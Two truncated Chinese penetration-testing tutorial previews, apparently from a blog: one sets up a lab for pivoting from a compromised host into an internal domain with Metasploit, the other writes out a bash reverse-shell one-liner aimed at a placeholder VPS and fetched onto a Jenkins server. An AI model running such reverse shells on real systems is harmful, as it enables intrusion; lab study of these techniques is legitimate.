实验环境: 攻击机:kali 192.168.144.217 靶 机: 外网机: 外网网卡:192.168.144.147 内网网卡:192.168.52.143 域控:192.168.52.138 内网机win7:192.168.52.99 Metasploit内网代理 在已获得外网机shell的情况下,上传msf马反弹会话 msfvenom -…
Bash反弹 1.在vps上新建文件,写入bash反弹shell一句话,并起web服务。 #bash反弹shell一句话 vim poc: bash -i >& /dev/tcp/vpsip/port 0>&1 #起web服务 Pyhto3 -m http.server 8080 2.下载poc到Jenkins服务器 p…